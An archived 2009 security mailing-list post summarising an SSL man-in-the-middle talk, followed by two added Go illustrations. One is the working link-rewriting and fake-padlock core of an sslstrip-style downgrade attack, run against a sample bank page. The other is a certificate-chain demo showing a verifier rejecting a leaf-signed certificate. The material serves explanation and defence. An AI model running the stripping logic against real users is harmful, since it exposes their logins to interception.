Dailydave mailing list archives
SSL MITM fun.
From: Dave Aitel <dave () immunityinc com>
Date: Thu, 19 Feb 2009 12:07:22 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is a good presentation.

https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

Essentially he details 3 attacks (from what I can tell):

1. Register a .cn address and use Unicode characters for / and ? to have
   HTTPS://www.paypal.com/?domain.cn?<some args> validate.

2. Force the user to stay on HTTP by a MITM proxy that does modifications to the
   data as it goes through. Send HTTPS to the server, and HTTP to the client. Use a
   lock icon as your favicon to fool the user into thinking they are "secure" even
   though they see HTTP:// instead of HTTPS://.

3. Sign the leaf cert with your leaf cert. This abuses an implementation flaw in
   OpenSSL, etc.

For bonus fun, he points out once again that banks and lots of sites do their
login pages in HTTP and not HTTPS.

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJnZHKtehAhL0gheoRAgoXAJ9LOxBGvjPr+2wconQPP1UOpL64mQCdEqkI
drFaFiCtCMsjl/E5FqQdX0w=
=5evO
-----END PGP SIGNATURE-----
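The second attack in Dave's list is the rewriting logic of an sslstrip-style proxy: every https:// link in a response that passes through the proxy is downgraded to http://, redirects to HTTPS login pages are downgraded the same way, a padlock favicon is injected so the browser chrome shows a lock next to the plaintext address, and the proxy remembers which URLs it downgraded so that the browser's later http:// request is fetched from the real server over TLS. The following is an added illustration of that state machine, not code from the talk's tool and not part of the email; it covers only the rewriting and bookkeeping, not the TCP/TLS proxying around it. The hostnames bank.example, the sample page and the favicon URL are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
	"sync"
)

// Stripper holds the state an sslstrip-style proxy needs: the set of URLs it has
// downgraded from https:// to http://, so that when the browser later requests
// the plaintext URL the proxy can fetch the original resource over TLS.
type Stripper struct {
	mu       sync.Mutex
	stripped map[string]bool // http:// URL -> was originally https://
	favicon  string          // padlock favicon the proxy serves (hypothetical URL)
}

func NewStripper(faviconURL string) *Stripper {
	return &Stripper{stripped: make(map[string]bool), favicon: faviconURL}
}

// httpsURL matches absolute https:// URLs up to the first whitespace, quote or angle bracket.
var httpsURL = regexp.MustCompile(`https://[^\s"'<>]+`)

// headTag locates the opening <head> tag so the favicon link can be injected after it.
var headTag = regexp.MustCompile(`(?i)<head[^>]*>`)

// downgrade rewrites one https:// URL to http:// and records it for UpstreamURL.
func (s *Stripper) downgrade(u string) string {
	plain := "http://" + strings.TrimPrefix(u, "https://")
	s.mu.Lock()
	s.stripped[plain] = true
	s.mu.Unlock()
	return plain
}

// RewriteBody is applied to every HTML/JS response relayed to the client: each
// https:// link becomes http://, and a padlock favicon is injected so the browser
// shows a lock icon next to a plain http:// address.
func (s *Stripper) RewriteBody(body string) string {
	out := httpsURL.ReplaceAllStringFunc(body, s.downgrade)
	if loc := headTag.FindStringIndex(out); loc != nil {
		link := fmt.Sprintf(`<link rel="icon" href=%q>`, s.favicon)
		out = out[:loc[1]] + link + out[loc[1]:]
	}
	return out
}

// RewriteLocation handles the common "HTTP page redirects to an HTTPS login":
// the Location header is downgraded so the browser never leaves plaintext.
func (s *Stripper) RewriteLocation(location string) string {
	if strings.HasPrefix(location, "https://") {
		return s.downgrade(location)
	}
	return location
}

// UpstreamURL maps a client's plaintext request back to the URL the proxy must
// fetch from the real server: https:// if the proxy downgraded it, unchanged otherwise.
func (s *Stripper) UpstreamURL(clientURL string) string {
	s.mu.Lock()
	defer s.mu.Unlock()
	if s.stripped[clientURL] {
		return "https://" + strings.TrimPrefix(clientURL, "http://")
	}
	return clientURL
}

// Stripped lists the downgraded URLs, sorted, for inspection.
func (s *Stripper) Stripped() []string {
	s.mu.Lock()
	defer s.mu.Unlock()
	out := make([]string, 0, len(s.stripped))
	for u := range s.stripped {
		out = append(out, u)
	}
	sort.Strings(out)
	return out
}

// SampleLoginPage is a constructed response body standing in for a bank's
// plaintext front page that links to an HTTPS login form.
const SampleLoginPage = `<html><head><title>Welcome</title></head><body>
<a href="https://bank.example/login">Log in</a>
<form action="https://bank.example/auth" method="post"><input name="pw"></form>
<a href="http://bank.example/help">Help</a>
</body></html>`

func main() {
	s := NewStripper("http://bank.example/lock.ico")
	fmt.Println(s.RewriteBody(SampleLoginPage))
	fmt.Println(s.RewriteLocation("https://bank.example/account"))
	fmt.Println(s.UpstreamURL("http://bank.example/login"))
	fmt.Println(s.Stripped())
}
```

The point the bookkeeping makes is that the server side of the connection still sees a normal TLS session: the certificate is real and the user never sees a warning, because the only plaintext hop is the one between the browser and the proxy. Nothing in the rewritten page tells the user that the login form was ever supposed to be HTTPS.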
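The third attack in the list depends on a verifier that does not check basicConstraints: an ordinary server certificate (CA:FALSE) is used as the issuer of a second certificate for the victim's hostname, and a broken chain builder accepts it because every signature in the chain is valid. The following is an added example, not code from the email or the talk, that builds exactly that chain with Go's standard library and shows what a correct verifier does with it: the leaf issued by the CA verifies, the certificate "issued" by that leaf is rejected. The CA, the hostnames attacker.example and www.victim.example, and the keys are all generated in-process for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// ChainResult holds the outcome of verifying the two chains built below.
type ChainResult struct {
	GoodChainErr error // CA -> attacker.example: should verify (nil)
	BadChainErr  error // CA -> attacker.example -> www.victim.example: must be rejected
}

// issue signs tmpl with the parent's key and returns the parsed certificate, so
// that parent fields such as SubjectKeyId are populated for the next link.
func issue(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

func BuildAndVerify() (ChainResult, error) {
	var res ChainResult
	notBefore, notAfter := time.Now().Add(-time.Hour), time.Now().Add(24*time.Hour)

	caKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return res, err
	}
	leafKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return res, err
	}
	bogusKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return res, err
	}

	// A root the client trusts (constructed; stands in for a public CA).
	caTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "Example Root CA"},
		NotBefore:    notBefore, NotAfter: notAfter,
		IsCA: true, BasicConstraintsValid: true,
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}
	ca, err := issue(caTmpl, caTmpl, &caKey.PublicKey, caKey)
	if err != nil {
		return res, err
	}

	// A normal server cert the attacker legitimately holds for their own domain.
	// basicConstraints CA:FALSE means this key must never be accepted as an issuer.
	leafTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: "attacker.example"},
		DNSNames:     []string{"attacker.example"},
		NotBefore:    notBefore, NotAfter: notAfter,
		BasicConstraintsValid: true, IsCA: false,
		KeyUsage:    x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	leaf, err := issue(leafTmpl, ca, &leafKey.PublicKey, caKey)
	if err != nil {
		return res, err
	}

	// The attack: sign a certificate for the victim's hostname with the leaf's key.
	bogusTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(3),
		Subject:      pkix.Name{CommonName: "www.victim.example"},
		DNSNames:     []string{"www.victim.example"},
		NotBefore:    notBefore, NotAfter: notAfter,
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	bogus, err := issue(bogusTmpl, leaf, &bogusKey.PublicKey, leafKey)
	if err != nil {
		return res, err
	}

	roots := x509.NewCertPool()
	roots.AddCert(ca)
	intermediates := x509.NewCertPool()
	intermediates.AddCert(leaf) // the attacker presents the leaf as the "intermediate"

	_, res.GoodChainErr = leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: "attacker.example"})
	_, res.BadChainErr = bogus.Verify(x509.VerifyOptions{Roots: roots, Intermediates: intermediates, DNSName: "www.victim.example"})
	return res, nil
}

func main() {
	res, err := BuildAndVerify()
	if err != nil {
		panic(err)
	}
	fmt.Println("CA -> attacker.example:", res.GoodChainErr)
	fmt.Println("CA -> attacker.example -> www.victim.example:", res.BadChainErr)
}
```

Both signatures in the bad chain are mathematically valid; the only thing standing between the attacker and a trusted certificate for www.victim.example is the check that each issuer in the path carries basicConstraints CA:TRUE (and a key usage permitting certificate signing). A verifier that only walks signatures back to a trusted root, without that check, is the implementation flaw the email refers to.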
Current thread:
- SSL MITM fun. Dave Aitel (Feb 19)
- Message not available
- SSL MITM fun. Dan Moniz (Feb 19)
- Re: SSL MITM fun. Alexander Sotirov (Feb 19)
- Re: SSL MITM fun. Dan Moniz (Feb 19)
- Re: SSL MITM fun. Chris Weber (Feb 20)
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- Re: SSL MITM fun. Alexander Sotirov (Feb 20)
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- Re: SSL MITM fun. Robert Święcki (Feb 20)
- Message not available
- Re: SSL MITM fun. Michal Zalewski (Feb 20)
- SSL MITM fun. Dan Moniz (Feb 19)
- Message not available
- Re: SSL MITM fun. Michal Zalewski (Feb 19)